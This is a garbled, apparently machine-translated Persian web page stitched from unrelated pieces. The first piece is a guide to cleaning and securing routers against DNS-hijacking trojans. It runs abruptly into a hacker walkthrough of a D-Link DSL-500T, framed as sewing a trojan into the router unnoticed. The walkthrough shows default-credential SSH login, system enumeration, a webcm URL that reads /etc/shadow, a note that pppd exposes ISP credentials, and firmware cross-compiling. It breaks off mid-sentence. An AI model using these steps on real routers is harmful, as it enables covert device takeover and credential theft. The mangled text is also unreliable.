نحوه راه اندازی گوشی های هوشمند و رایانه های شخصی پرتال اطلاعاتی
  • خانه
  • سیستم عامل
  • ویروس در روتر - DNS مخرب. Avast می نویسد که روتر آسیب پذیر است، آلوده است یا به درستی پیکربندی نشده است.

ویروس در روتر - DNS مخرب. Avast می نویسد که روتر آسیب پذیر است، آلوده است یا به درستی پیکربندی نشده است.

برای محافظت از خود در برابر تروجان Trojan.Rbrute که به مودم ها/روترهای TP-link حمله می کند، باید چند شرط ساده را رعایت کنید. ویروس با اسکن brute-force آدرس های IP در محدوده n گسترش می یابد و پس از آن حدس زدن رمز عبور با استفاده از روش brute force آغاز می شود. تقریباً تمام مدل های محبوب روترهای Tp-link در معرض حمله قرار می گیرند. تروجان با ورود به تنظیمات دستگاه، آدرس های DNS ارائه دهنده را به آدرس مهاجمان تغییر می دهد.

روتر شما آلوده است اگر:

هنگام تلاش برای خروج از سیستم هروب سایت، خواه remont-sro.ru باشد یا سرویس Gmail.com، یک سایت دانلود برای Google Chrome جعلی یا سایر منابع مشکوک باز می شود. در ابتدا، تغییر مسیر فقط برای درخواست‌های کاربران حاوی کلمات Facebook یا Google کار می‌کرد، اما اکنون تروجان به هر یک از آنها پاسخ می‌دهد. علامت روی مودم ثابت می ماند، "اینترنت" به طور پیوسته روشن می شود، کامپیوتر نشان می دهد که اتصال کامل شده است، مجوز تکمیل شده است، اما خود اینترنت کار نمی کند، فقط به صفحات تبلیغاتی و/یا دانلود جعلی هدایت می شود

نقطه 1. تنظیم مجدد. تنظیم مجدد مودم
دستورالعمل ها توسط ماریا کورچاژینا، متخصص از GTP TsOO تهیه شده است

اگر نمی توانید از طریق 192.168.1.1 به تنظیمات مودم دسترسی پیدا کنید، آن را از طریق آدرس 192.168.42.1 انجام دهید.

در این صفحه تنظیمات نشان داده شده است فقطبرای سرویس اینترنت برای راه اندازی IP-TV و WI-FI، راهنمای کامل را دانلود کنید

نسخه روسی - http://yadi.sk/d/JC6l6FPVRbU9P

نسخه انگلیسی - http://yadi.sk/d/j6Ly7bA4RbU8r

1. برای تنظیم مجدد تنظیمات روی مودم، دکمه را با سوزن/خمیر/خلال دندان نگه دارید. بازنشانی کنیددر یک فرورفتگی کوچک 5 تا 15 ثانیه نگه دارید تا نشانگر روی دستگاه ناپدید شود. چراغ ها باید درست مانند پس از راه اندازی مجدد روتر معمولی خاموش شوند.

2. برای پیکربندی، مودم باید با کابل به هر پورت LAN متصل شود، از طریق اتصال Wi-Fi پیکربندی نشود.

3. از طریق مرورگر اینترنت اکسپلورر به رابط روتر در آدرس: 192.168.1.1 بروید. یک کادر محاوره ای باز می شود. در قسمت های «نام کاربری» و «رمز عبور» به ترتیب admin/admin را وارد کنید. صفحه اصلی روتر باز می شود (به زیر مراجعه کنید)

در این صفحه خواهید دید که چه تنظیماتی از قبل وجود دارد:

4. قبل از شروع به تنظیم روتر، برای انجام این کار باید تمام تنظیمات ایجاد شده قبلی را حذف کنید "تنظیمات رابط" -> "اینترنت"، "کانال مجازی" - PVC0 را انتخاب کنید، در پایین صفحه روی دکمه "حذف" کلیک کنید. ما این کار را با هر کانال مجازی انجام می دهیم (در مجموع 8 کانال وجود دارد).

در نتیجه، این چیزی است که باید اتفاق بیفتد (دوباره به بخش بروید "حالت"):

5. حالا به بخش بروید "تنظیمات رابط"، سپس یک زیربخش را انتخاب کنید "اینترنت"(نگاه کنید به تصویر زیر). پارامترها را مانند تصویر زیر (کاربر و رمز عبور: rtk) مشخص می کنیم، سپس با کلیک بر روی دکمه "ذخیره"، تمام پارامترها را ذخیره می کنیم.
این کار تنظیمات حالت PPPoE را تکمیل می کند.

نکته 2. تغییر رمز ورود به روتر

برای تغییر رمز عبور به بخش مراجعه کنید "عملکرد دستگاه"، سپس "مدیریت"، جایی که رمز عبور برای ورود به روتر در واقع تغییر می کند (یک رمز عبور پیچیده ایجاد کنید) (عکس زیر را ببینید). سپس دکمه را فشار دهید "صرفه جویی"

بند 2.5 فهرست رمزهای عبوری که برای ورود به روتر توصیه نمی شود

111111
12345
123456
12345678
abc123
مدیر
مدیر
کلمه عبور
qwerty
ریشه
tadpassword
trustno1
مصرف كننده
اژدها
gizmodo
اقرقوکسم
letmein

ویروس از قبل همه این رمزهای عبور را "می داند" و حدس زدن رمز عبور 1 ثانیه طول می کشد. رمز عبور فقط نباید از اعداد یا حروف تشکیل شده باشد. کاراکترهای خاص (هش، ستاره، درصد، علامت نقل قول) و حروف با حروف مختلف (بزرگ و کوچک) باید وجود داشته باشد. هرچه گذرواژه بزرگتر و متنوع تر باشد، مدت زمان بیشتری طول می کشد تا آن را "بی رحم" کنید (اگر اصلا وجود داشته باشد).

نقطه 3. دسترسی به مودم را به پورت WAN محدود کنید.

با توجه به افزایش تعداد موارد جایگزینی DNS توسط بدافزار در دستگاه های کاربران اینترنت، این سوال در مورد امنیت روترهای Wi-Fi مطرح می شود. چگونه روتر خود را برای ویروس بررسی کنیم? نحوه حذف ویروس از روتر? سوال پیچیده و در عین حال ساده است. راه حلی وجود دارد!


خود ویروس به دلیل فضای کم در حافظه خود روتر نمی تواند خود را در اکثر روترهای مدرن ضبط کند، اما می تواند روتر را برای مشارکت در یک بات نت زامبی کند. به عنوان یک قاعده، این یک بات نت برای حمله به سرورهای مختلف، یا برای تغییر مسیر و تجزیه و تحلیل جریان اطلاعاتی است که شما را در اینترنت می‌گذارد.

رمز عبور و مکاتبات شخصی شما ممکن است به دست مهاجمان بیفتد!

این باید هرچه سریعتر برطرف شود.

  • ریست کردن روتر
  • سیستم عامل روتر
  • بازنشانی

ریست کردن روتر

با فشار دادن دکمه ریست می توانید تنظیمات روتر را بازنشانی کنید. معمولا این دکمه در پشت روتر، جایی که پورت های LAN قرار دارند، قرار دارد. معمولاً دکمه در یک سوراخ فرو رفته است تا از فشار دادن تصادفی جلوگیری شود، بنابراین باید از خلال دندان استفاده کنید. این تنظیمات روتر تغییر یافته توسط ویروس را حذف می کند و تنظیمات کارخانه را در جای خود نصب می کند. من باید به شما هشدار دهم که اگر نمی دانید چگونه یک روتر را پیکربندی کنید، پس تنظیم مجددتنظیمات آن برای شما ارزشش را ندارد!

سیستم عامل روتر

گاهی اوقات ویروس "سیل" می زند سیستم عامل اصلاح شدهبه روتر برای حذف سیستم عامل ویروس از روتر، می توانید دوباره روتر را فلش کنید.

کامپیوتر را با کابل LAN به روتر وصل کنید. یک کابل LAN با هر روتر همراه است. یا اگر اتصال کابلی امکان پذیر نیست از طریق Wi-Fi. بهتره با کابل وصل بشی!اتصال بی سیم ناپایدار در نظر گرفته می شود و برای به روز رسانی سیستم عامل روتر مناسب نیست.

پس از اتصال به روتر، مرورگر (Chrome، Opera، Mozilla، IE) را باز کنید و آدرس روتر ASUS را در نوار آدرس وارد کنید، برای ایسوس 192.168.1.1 است، در صفحه ای که باز می شود باید ورود و رمز عبور خود را وارد کنید تا وارد تنظیمات روتر شوید. ورود: admin، رمز عبور: admin. اگر لاگین و رمز عبور مطابقت ندارند، از شخصی که روتر را برای شما تنظیم کرده است بپرسید، شاید او آنها را تغییر داده است.

سفت‌افزار را از وب‌سایت سازنده دانلود کنید و با استفاده از صفحه تنظیمات روتر، میان‌افزار روی دیسک را انتخاب کنید. برای اکثریت قریب به اتفاق روترها، مراحل سیستم عامل یکسان است.

خوانندگان عزیز. به منظور صرفه جویی در وقت شما. بیایید بلافاصله در مورد چیز اصلی صحبت کنیم. همه موارد زیر در حضور تروجان ها یا ویروس ها در رایانه به مدت 5-7 روز کمک می کند. در این مدت، اسکن ها از اینترنت ارسال می شود، اما پس از هک، سکوت مشکوکی برقرار می شود - اسکن وجود ندارد - روتر آلوده دیگر آنها را به رایانه شخصی اجازه نمی دهد، دستورات را می پذیرد و آنها را اجرا می کند. این روی سرعت اینترنت تأثیر می گذارد - کاهش می یابد.

اگر روتر شما قبلاً آلوده شده باشد، در آینده نزدیک سرقت FTP، ایمیل و سایر رمزهای عبور اتفاق خواهد افتاد.

قبلاً در سال 2009 شخصی DroneBL جهان را در مورد اپیدمی (آغاز؟) ویروس هایی که روترها را آلوده می کنند، آگاه کرد. اخبار او پس از حمله به این سایت ظاهر شد. این حمله توسط روترهای آلوده انجام شد. بنابراین اکنون، "خانواده" رایانه های زامبی افزوده جدیدی به دست آورده است - روترهای زامبی. یک شبکه بات نت که از روترهای خانگی آلوده تشکیل شده بود کشف شد! آنها این شبکه را "psyb0t" نامیدند. اینگونه بود که اپیدمی ویروس روتر رسما آغاز شد.

هک با اسکن پورت های روتر و در دست گرفتن کنترل روی آن رخ می دهد. متأسفانه، مقالاتی در اینترنت در مورد اینکه چگونه این یا آن مدل روتر ساده ترین هک است وجود دارد. اما آنجاست که می توانید دریابید که چگونه از خود در برابر این فاجعه محافظت کنید. پس از کنترل روتر، جاسوسی از محتویات ترافیک عبوری آغاز شد. سرقت رمز عبور پیوستن به فعالیت های مخرب عمومی شبکه های بات نت در اینترنت جهانی. در حال اسکن پورت های کامپیوتر خانگی خود هستید، اما من در اینجا به جزئیات بیشتری می پردازم. نویسنده توانست ردیابی کند که داشتن اتصال شبکه به یک روتر هک شده منجر به چنین مشکلاتی می شود. هنگامی که فایروال را دوباره نصب می کنید، ویروس ها در سیستم ظاهر می شوند. هنگام تلاش برای نصب دبیان یا اوبونتو در حین دانلود همزمان به روز رسانی ها در طول مراحل نصب، این سیستم ها به درستی نصب نمی شوند. برای مثال

  1. راه اندازی Firestarter نصب شده غیرممکن است - عملکرد اداری راه اندازی شده است و تمام. به عنوان مثال، چیزی با امتیازات مدیریت راه اندازی شده است، اما آنچه ناشناخته است. Firestarter فقط شروع نمی شود.
  2. اگر اتصال به اینترنت وجود داشته باشد، Deadbeef هنگامی که روتر را خاموش می کنید، شروع نمی شود، بلافاصله روشن می شود.
  3. برخی از برنامه هایی که نیاز به امتیازات مدیریت دارند بدون درخواست رمز عبور راه اندازی می شوند، برخی دیگر اصلاً شروع نمی شوند.
  4. از زمان نوشتن این مقاله، این نکات کمتر به چشم می خورد. یعنی مشکلاتی وجود خواهد داشت، اما آنها متفاوت به نظر می رسند.

نصب مجدد در همان رایانه، از همان دیسک نصب، با روتر خاموش، با موفقیت انجام شد. سیستم (تست شده در اوبونتو) مانند ساعت کار می کرد. این تعجب آور نیست، زیرا روترهایی که سیستم عامل لینوکس Mipsel را اجرا می کنند اولین کسانی بودند که آسیب پذیر بودند. البته، آسیبی که از یک روتر زامبی وارد می‌شود، «متنوع‌تر» از آن چیزی است که من متوجه شدم و در اینجا توضیح دادم، اما آنچه در حال حاضر در آن غنی هستیم، این چیزی است که به اشتراک می‌گذاریم...

ویندوز نصب شده (با روتر آلوده غیرفعال شده) "زنده ماند"، اما Agnitum Outpost Firewall Pro اسکن پورت ها را از همان دقایق اولیه پس از نصب شناسایی کرد. آن ها روتر به پورت(ها) حمله می کند.

برنج. اسکن پورت های من از اینترنت و در نهایت از روتر آلوده.

همانطور که در شکل مشاهده می کنید، در تاریخ 1396/04/27 در ساعت 23:51:16 اسکن از روتر زامبی انجام شد. قبل از این، اسکن‌هایی از Kaspersky Security Network - 130.117.190.207 وجود داشت (دیوار آتش آنها را "پسند" نمی‌کند، اما زمانی که Kaspersky نصب می‌شود، این حالت عادی است) و مشخص نیست کجاست. و در تاریخ 04/27/12 تنظیمات روتر به تنظیمات کارخانه بازنشانی شد (Huawei HG530). از آن زمان، آنها فقط از Kaspersky Security Network - 130.117.190.207 و ARP_UNWANTED_REPLY سرچشمه می گیرند - نویسنده فیلتر کردن ARP را فعال کرده است. بنابراین، روتر تلاش می کند یک بار دیگر با رایانه شخصی "صحبت کند" (این یک فعالیت عادی روتر است - اما اکنون Agnitum فقط پاسخ های ARP را که در پاسخ به درخواست رایانه شخصی من می آید) و همچنین تلاش های برخی از افراد ارسال می کند. برای رهگیری ترافیک با استفاده از یک پاسخ جعلی ARP توسط فایروال مسدود می شوند. اگر کسی ترافیک من را به این روش رهگیری کند و آن را از طریق رایانه خود عبور دهد، من در نقش یک کارمند دفتر با استفاده از اینترنت خواهم بود، در حالی که مدیر سیستم این شرکت همه اقدامات من را می بیند و گزارش مفصلی برای رئیس تهیه می کند. . چند نامه نوشته شد (به چه کسی، در مورد چه چیزی)، چند نفر در ICQ چت کردند. البته رمزهای ایمیل و غیره. آنها همچنین می توانند آن را بدزدند.

نتیجه این است که از لحظه ای که روتر خود را ریست کردم و آنچه را که در زیر توضیح دادم انجام دادم، هیچ حمله ای از سوی اینترنت وجود ندارد. "Gunner" حذف شده است، روتر تمیز است و فقط کاری را که برای آن طراحی شده است انجام می دهد. اما تروجان موجود در رایانه شخصی نیز باید حذف شود، در غیر این صورت هکرها را به سمت IP شما هدایت می کند.

کسانی که تجهیزات شبکه می سازند اقدامات امنیتی ارائه نمی دهند. در دستورالعمل روترها توضیحی در مورد نحوه وارد کردن لاگین و رمز ورود برای دسترسی به ارائه دهنده وجود دارد، اما هیچ کلمه ای وجود ندارد که رمز عبور پیش فرض ادمین را نمی توان در روتر گذاشت! علاوه بر این، روترها لزوما دارای عناصر کنترل از راه دور هستند که اغلب روشن می شوند. سازندگان نرم افزارهای آنتی ویروس ساکت هستند. به ناچار این سوال مطرح می شود که چه کسانی از این کار سود می برند.

راه های عفونت

بهتره یه بار ببینیش به همین دلیل، من یک انیمیشن GIF با تجزیه و تحلیل شماتیک از وضعیت ارائه می دهم. اگر قابل مشاهده نیست، Adblock یا چیزی مشابه تداخل دارد - آن را در این صفحه خاموش کنید.

دو تا از آنها موجود است. اولین مورد از طریق WAN، با نام مستعار اینترنت است. آن ها هکرها IP شما را پیدا می کنند، به عنوان مثال، زمانی که فایل ها را با استفاده از پروتکل تورنت دانلود یا توزیع می کنید (در این مورد در انتهای مقاله بیشتر توضیح داده شده است) و با اسکن IP شما نقاط ضعفی در امنیت روتر پیدا می کنند. اما این کمتر رایج است. نحوه بستن این دروازه ها را در ادامه این مقاله می خوانیم.

یا یک تروجان در رایانه شخصی ما وجود دارد. و بنابراین او هکرها را به IP پویا (!) ما هدایت می کند. با دانستن این آدرس، آنها در حال حاضر به طور روشمند روتر را هک می کنند. در مورد تروجان ها در مسیر دوم آلودگی خواندیم.

مورد دوم از طریق LAN است، یعنی از رایانه شما. اگر یک تروجان روی رایانه شخصی شما وجود داشته باشد، هکرها می توانند رمز عبور روتر را مستقیماً از رایانه شخصی شما حدس بزنند. بنابراین، این رمز عبور باید گاهی اوقات تغییر کند. اما در مورد این واقعیت که یک رایانه آلوده سعی می کند روتر را از سمتی که محافظت نشده است هک کند، چطور؟ ابتدا باید بدانید که یک روتر تمیز با یک کامپیوتر آلوده عمر زیادی نخواهد داشت. نیروی بی رحم منظم (حدس زدن رمز عبور) آن را در عرض یک هفته یا حتی سریعتر می شکند. بنابراین، اگر مجبور هستید روتر خود را مرتباً تمیز کنید، وقت آن است که به پاکسازی کامل آن از ویروس ها فکر کنید.

و الان لحظه ویروس/تروجان در رایانه شخصی از کجا می آید؟ دلایل و راه حل های اصلی را در پرانتز لیست می کنم. گزینه ها عبارتند از:

1- ویندوز کرک شده اولیه نصب شد (از دیسک های نصب خالی استفاده کنید).

2- ویندوز تمیز بعد از نصب کرک شد (یا تحمل کنید و ماهانه دوباره نصب کنید یا ویندوز بخرید).

3 - نرم افزار کرک شده (استفاده از برنامه های رایگان یا خرید پولی)

4- در فایل های شخصی خود ویروس دارید (همه فایل های شخصی را از طریق پاکسازی اجرا کنید، همانطور که در پاکسازی سیستم از ویروس ها توضیح دادم).

5 - سیستم از قبل در حین استفاده از طریق فلش مموری، اینترنت، چه کسی می داند آلوده شده است (محافظت - ما اینترنت را به روش ایمن مطالعه می کنیم، در مورد درایوهای فلش، در مورد آخرین نکته سکوت خواهم کرد).

به طور جداگانه، متذکر می شوم که با کشف IP روتر، هکرها شروع به اسکن آن می کنند تا به رمز عبور رمزگذاری شده دسترسی پیدا کنند و سپس با استفاده از رمز عبور سرقت شده، کنترل را در دست بگیرند. بنابراین، اگر در حال حاضر به دسترسی به اینترنت نیاز ندارید، روتر را روشن نگذارید.

ولی!!! حتی اگر با استفاده از ماشین مجازی راه‌اندازی کنید، روتر شما شروع به خرابی می‌کند. غیرفعال کردن آن و فعال کردن مجدد آن در طول فرآیند به اینجا کمک می کند، و نکته اصلی پس از اتمام دانلود تورنت این است که پس از راه اندازی مجدد، ارائه دهنده یک IP پویا جدید به روتر می دهد و هکرها فقط باید حدس بزنند که اکنون در چه آدرسی هستید. . و روتر شما نیز ... البته، توزیع ها برای شما باقی نمی ماند - پس از اتمام دانلود، باید بلافاصله برنامه دانلودر تورنت را خاموش کنید و پس از آن، روتر را خاموش و روشن کنید.

و به طور کلی

روتر را روشن نگه ندارید مگر اینکه نیاز داشته باشید! اجازه ندهید هکرهای کوچک دوباره به اموال شما دسترسی پیدا کنند... فراموش نکنید که هر بار که سرعت اتصال به اینترنت به طور غیرمنطقی کاهش می یابد، روتر خود را تمیز کنید. احتیاط ضرری نداره...

خودشه. اکنون می توانید دستورالعمل های کارخانه روتر خود را بردارید و لاگین و رمز عبور صادر شده توسط ارائه دهنده اینترنت خود را مشخص کنید. این معمولاً در تب تنظیمات WAN انجام می شود. اکنون نمی توانید روتر خود را از طریق اینترنت کنترل کنید. حداقل فعلا.

سلام خواننده من! در این مقاله در مورد روترهای عالی ADSL صحبت خواهم کرد
– قطعات آهنی که در شبکه های خانگی و صنعتی ضروری است. من در مورد سوال به شما می گویم
بهره برداری از این غدد برای اهداف مفید برای ما - خیاطی در وحشیانه
تروجان داخل روتر و به گونه ای که هیچ کس متوجه نشود
یک ادمین باهوش، نه یک کاربر باهوش.

خواسته ها یا الزامات IQ

وقتی این مقاله را نوشتم، تصور کردم که خواندن آن کافی است
کاربر پیشرفته با GNU\Linux نصب شده که مهارت هایی نیز دارد
کار و برنامه نویسی در این سیستم عامل. با این حال، به نظر می رسد
ممکن است مراحل من را در ویندوز تکرار کنم (مثلاً با استفاده از Cygwin)، اما
این توضیح داده نخواهد شد. برای به دست آوردن حداکثر لذت شما نیز نیاز دارید
مهارت های آهن لحیم کاری (این اختیاری است).

و همه چیز شروع شد...

یه جورایی حواسم پرت شد بنابراین، همه چیز از زمانی شروع شد که همین یکی یک روز تلفن را قطع کرد
قطعه سخت افزاری، یا بهتر است بگوییم، خیانتکارانه اتصال به اینترنت را قطع کرد و این کار را نکرد
من می خواستم آن را بازیابی کنم. در همان زمان، او دور بود و از نظر فیزیکی در دسترس بود
من آنجا نبودم تا او را ببینم (اما به نوعی دروغ می گفتم - خیلی تنبل بودم که از روی مبل بلند شوم
روتر را دوباره راه اندازی کنید :))، رابط وب پاسخ نداد، اما من آن را به یاد آوردم
این چیز باید telnet یا ssh داشته باشد. وارد بخش مدیریت شوید
قبلاً امتحان نکرده‌ام و با بی‌احتیاطی رمز عبور حساب کاربری خود را تغییر نداده‌ام (همانطور که
بعدا معلوم شد، بسیار بیهوده، زیرا به طور پیش فرض "admin:admin" است). پس من
SSH را امتحان کرد و کار کرد!

$ssh [ایمیل محافظت شده]
$Password:

مثل یک پیچ از آبی! BusyBox! هرگز به این موضوع فکر نکردم که تحت چه کسی است
این روتر کنترل می شود، به نظر می رسد - گنو/لینوکس! احساس وحشت کردم
من تعجب می کنم که همه چیز اینجا چگونه کار می کند، و از نظر ذهنی به لطف تنبلی و شانس، من
وارد تحقیق شد

مجموعه اطلاعات

پس از کجا شروع کردم؟ البته از لیست دستورات موجود:

#جعبه مشغول
...
توابع تعریف شده فعلی:
[, خاکستر, busybox, cat, chgrp, chmod, chown, cp, date, dd, df, echo, false, free,
grep، نام میزبان، شناسه، ifconfig، init، insmod، kill، ln، لاگین، ls، lsmod، mkdir،
modprobe, mount, mv, passwd, ping, ps, pwd, reboot, rm, rmmod, route, sh, sleep,
همگام سازی، تار، تست، tftp، لمس، درست، tty، مقدار، wget، whoami، بله

مجموعه کاملا معقول است، برای تحقیق عادی و اجرای ایده ها کافی است.
بعد، علاقه به نسخه هسته بیدار شد:

# cat /proc/version
نسخه لینوکس 2.4.17_mvl21-malta-mips_fp_le (root@xy) (gcc نسخه 2.95.3
20010315 (انتشار/MontaVista)) #1 پنجشنبه 28 دسامبر 05:45:00 CST 2006

برای مرجع: MontaVista توزیعی است که هدف آن embedded است
سیستم های. اکثریت قریب به اتفاق تولید کنندگان تجهیزات شبکه ارائه می کنند
اولویت برای این سیستم همچنین می توان آن را در دستگاه های دیگر، به عنوان مثال، در
کتاب های الکترونیکی یا تلفن های همراه.

# cat /etc/versions
CUSTOMER=DLinkRU
MODEL=DSL-500T
VERSION=V3.02B01T01.RU.20061228
HTML_LANG=EN.302
BOARD=AR7VW
VERSION_ID=
CPUARCH_NAME=AR7
MODEL_ID=
FSSTAMP=20061228055253

# cat /proc/cpuinfo
پردازنده
: 0
مدل cpu
: MIPS 4KEc V4.8
BogoMIPS
: 149.91
دستورالعمل صبر کنید: خیر
تایمرهای میکروثانیه: بله
بردار وقفه اضافی: بله
نقطه نظارت سخت افزاری: بله
استثناهای VCED: در دسترس نیست
استثناهای VCEI: در دسترس نیست

AR7 یک تراشه دو هسته ای است که توسط Texas Instruments ساخته شده است. او
شامل یک روتر ADSL تمام عیار بر روی یک تراشه است که از استانداردهای ADSL1 پشتیبانی می کند،
ADSL2,ADSL2+. بر اساس پردازنده RISC با کارایی بالا MIPS 4KEc، با
فرکانس ساعت 175 یا 233 (بسته به تکنولوژی تولید: 18 میکرون
یا 13 میکرومتر). این تراشه شامل 2 رابط UART روی برد است که یکی از آنها (UART_A)
برای خروجی اطلاعات اشکال زدایی و همچنین یک رابط EJTAG که خدمت می کند استفاده می شود
برای اشکال زدایی (سیرم افزار) حافظه فلش. استفاده از این رابط ها مورد بحث قرار خواهد گرفت
در زیر شرح داده شده است.

در نهایت به اطلاعات حافظه نگاه کردم:

# cat /proc/mounts
/dev/mtdblock/0/squashfs ro 0 0
هیچ /dev devfs rw 0 0
proc /proc proc rw 0 0
ramfs /var ramfs rw 0 0

# cat /proc/mtd
dev: اندازه پاک کردن نام
mtd0: 0034f000 00010000 "mtd0"
mtd1: 00090f70 00010000 "mtd1"
mtd2: 00010000 00002000 "mtd2"
mtd3: 00010000 00010000 "mtd3"
mtd4: 003e0000 00010000 "mtd4"

به طور طبیعی، بدون فراموش کردن آدرس های بلوک:

# cat /proc/ticfg/env | grep mtd
mtd0 0x900a1000,0x903f0000
mtd1 0x90010090,0x900a1000
mtd2 0x90000000,0x90010000
mtd3 0x903f0000,0x90400000
mtd4 0x90010000,0x903f0000

از موارد فوق نتیجه می گیرد که حافظه فلش (/dev/mtdblock) دارای 5 بلوک است:

mtd0– تصویر فایل سیستم SquashFs. این یک فایل خاص است
سیستمی که فشرده و فقط خواندنی است. برای
الگوریتم فشرده سازی gzip استفاده می شود، اما در این مورد - LZMA (نسبت فشرده سازی
بالاتر). حجم این بلوک 4 مگابایت است.

mtd1– این بلوک حاوی هسته MontaVista است که با الگوریتم LZMA فشرده شده است
شرایط، اندازه بلوک 600 کیلوبایت.

mtd2– بوت لودر ADAM2، هسته را بارگذاری می کند، همچنین دارای
سرویس سرور FTP برای بازیابی و فلش. جزئیات بیشتری در مورد آن وجود خواهد داشت
در ادامه بیان شد. حجم بلوک 64 کیلوبایت است.

mtd3- بین داده های پیکربندی و محیط تقسیم می شود
بلوک (متغیرهای محیطی) که می توانید در /proc/ticfg/env به آن نگاه کنید.
داده های پیکربندی در /etc/config.xml قرار دارند. واسطه بین فایل
سیستم، بلوک پیکربندی بسته است (مانند همه cm_*، کنترل، o
آنها را بعدا) برنامه cm_logic. حجم این بلوک نیز 64 کیلوبایت است.

mtd4- این شامل امضای سیستم عامل، هسته و تصویر فایل است
سیستم های. این بلوک هنگام به روز رسانی سیستم عامل از طریق رابط وب استفاده می شود.
ابتدا در این بلوک ذخیره می شود، سپس چک جمع بررسی می شود
و اگر مناسب باشد، برای مکان جدیدش ثبت نام می کند.

رم (16 مگابایت در این مدل، اما ADAM2 در این مدل
فقط 14 مگابایت می بیند، با به روز رسانی درمان می شود)، در پوشه /var نصب می شود، و آن
شما به راحتی می توانید از آن برای اهداف ما استفاده کنید:

#رایگان
کل بافرهای مشترک رایگان استفاده شده
مم: 14276 10452 3824 0

فراموش نکنیم که فهرست فرآیندها را مرور کنیم. از موارد جالبی که در اینجا کمین کرده اند
دیمون ها: thttpd - وب سرور. dproxy - سرور پروکسی کش درخواست های DNS. ddnsd
- دیمون DNS؛ pppd... دیمون واقعی است که اتصال را از طریق پروتکل پیاده سازی می کند
PPP، و در پارامترها اطلاعات حساب را می بینیم. بنابراین، اگر روتر نیست
وانمود می کند که شلنگ است (بخوانید - نه در حالت پل)، سپس می توانید
آسان برای گرفتن یک حساب کاربری

برنامه های cm_* بسته شده اند و کد منبع قبلاً شامل می شود
کامپایل شده (این برنامه ها نیز توسط Texas Instruments در D-Link توسعه یافته اند
نزاع بر سر عدم رعایت مجوزها فایده ای ندارد).

cm_logic– برنامه ای که منطق سیستم را از طریق آن کنترل می کند
پیکربندی در حال انجام است. /etc/config.xml را با آن همگام می کند
قسمت مربوطه از محتویات /dev/ticfg (اشاره به mtd3).

cm_cli- رابط خط فرمان برای مدیریت و پیکربندی
سیستم های. برای مثال تنظیمات اتصال از طریق این رابط انجام می شود.

cm_pc- راه اندازی و نظارت بر فرآیندها، ارتباط با قوانین
(به عنوان مثال، برنامه را به صورت دیمون اجرا کنید؛ قوانین همچنین شامل اطلاعاتی در مورد
پورت های باز) شرح داده شده در /etc/progdefs.xml؛ بلافاصله پس از بارگیری
هسته ها

webcm- رابط CGI، نشتی، به عنوان مثال به شما اجازه می دهد به /etc/shadow نگاه کنید،
به سادگی با دسترسی به URL.

http://192.168.1.1/../../../etc/shadow

من چیزی دریافت نکردم، thttpd چندان ساده نیست، اما اگر چنین است:

http://192.168.1.1/cgi-bin/webcm?getpage=/etc/shadow

یک چیز دیگر. در صورت عدم دسترسی می توان از این برای جمع آوری اطلاعات استفاده کرد
ssh/telnet، اما دسترسی به رابط وب وجود دارد.

firmwarecfg- برای فلش کردن سیستم عامل از طریق رابط وب استفاده می شود. در ورودی
از این برنامه، یک تصویر با یک درخواست POST از رابط وب منتقل می شود، و آن را قبلا
پس از بررسی اولیه چک‌جمع تصویر، به حافظه فلش هدایت می‌شود.

در این مرحله، جمع آوری اطلاعات اولیه تکمیل می شود، زمان آن است که به سمت تصمیم گیری حرکت کنیم
اقدامات.

نصب ابزارهای توسعه و کامپایل سیستم عامل

سفت‌افزار برای روترهای D-Link (و سایر موارد مبتنی بر گنو/لینوکس)
توزیع شده تحت مجوز GPL، می توانید آنها را در رسمی دریافت کنید
سرور FTP. در واقع، شما می توانید هر یک از لیست سیستم عامل های پیشنهادی را انتخاب کنید،
آنها یکسان هستند (در مورد سری T). تحویل شامل کد منبع هسته، محیط،
ابزارها و زنجیره ابزار لازم برای توسعه/تدوین ابزارهای موجود
برنامه ها. باید به root باز شود و به متغیر محیطی اضافه شود
مسیر PATH به دایرکتوری toolchain bin:

$ tar xvf tools.tgz
$ صادرات PATH=$PATH:/opt/

اکنون برای کامپایل سیستم عامل خود، به دایرکتوری بروید
با کدهای منبع و همین make را اجرا کنید.

$ cd DSL/TYLinuxV3/src && make

سوالات زیادی در مورد فعال کردن پشتیبانی دستگاه پرسیده می شود (بهتر
به آنها پاسخ مثبت دهید). پس از تکمیل کامپایل، در دایرکتوری TYLinuxV3/images
تصاویر سیستم عامل ایجاد خواهد شد. همچنین می توانید اسکریپتی را با همان نام خود اجرا کنید
مدل از دایرکتوری /TYLinuxV3/src/scripts.

چند کلمه در مورد انتقال فایل بین روتر و کامپیوتر. اولین
روشی که من استفاده کردم توانایی انتقال فایل ها از طریق پروتکل SSH است،
برای این کار از برنامه scp استفاده کنید. اما کمی بعد متوجه شدم که mc (نیمه شب
Commander) همچنین قابلیت اتصال از طریق SSH (پنل -> اتصال شل) را دارد.
از طرف دیگر، می توانید یک سرور وب یا FTP در محل کار خود راه اندازی کنید. بعدا من
من به وب سرور ترجیح دادم، زیرا سریعترین کار را انجام می دهد. من آن را نصب کردم
thttpd، کوچک و سریع، درست مانند روتر. ما آن را در خانه راه اندازی می کنیم و آن را دانلود می کنیم
فایل روتر، پس از رفتن به پوشه /var (همانطور که گفته شد
قبل از آن، برای ضبط در دسترس است).

$ thttpd -g -d ~/ForRouter -u user -p 8080
# سی دی /var
# wget http://192.168.1.2/file

برای دانلود یک فایل از روتر، می توانید وب سرور را نیز بالا ببرید:

# thttpd -g -d /var -u ریشه -p 8080

لطفا توجه داشته باشید که اگر می خواهید یک فایل اجرایی را از روتر دانلود کنید، باید
حذف حقوق راه اندازی هنگام دانلود تعداد زیادی فایل از روتر
بهتر است از mc استفاده کنید، لازم نیست ابتدا فایل ها را در /var کپی کنید و
حقوق را حذف کنید و سپس این فایل ها را حذف کنید تا فضا آزاد شود. به طور کلی، موضوع
سلیقه، هر گزینه ای که برای شما مناسب است را انتخاب کنید.

ایجاد برنامه خود

بیایید، البته، با یک برنامه نویسی کلاسیک - HelloWorld - شروع کنیم. چند تا خاص
مقرراتی در کار نیست. متن برنامه به طرز دردناکی آشناست:

#عبارتند از
#عبارتند از

int main (void)
{
printf("Mate.Feed.Kill.Repeat.");
بازگشت 0;
}

کامپایل (مسیر زنجیره ابزار باید در متغیر محیطی مشخص شود
مسیر):

$ mips_fp_le-gcc hell.c -o hell
$ mips_fp_le-strip -s hell

# سی دی /var
# chmod + x hell
# ./جهنم

و... هیچ اتفاقی نمی افتد یا اعلان مسیر یافت نشد ظاهر می شود. چیست؟
مورد؟ من قبلاً در مورد cm_pc صحبت کرده ام - این برنامه برنامه های دیگر را در آن راه اندازی می کند
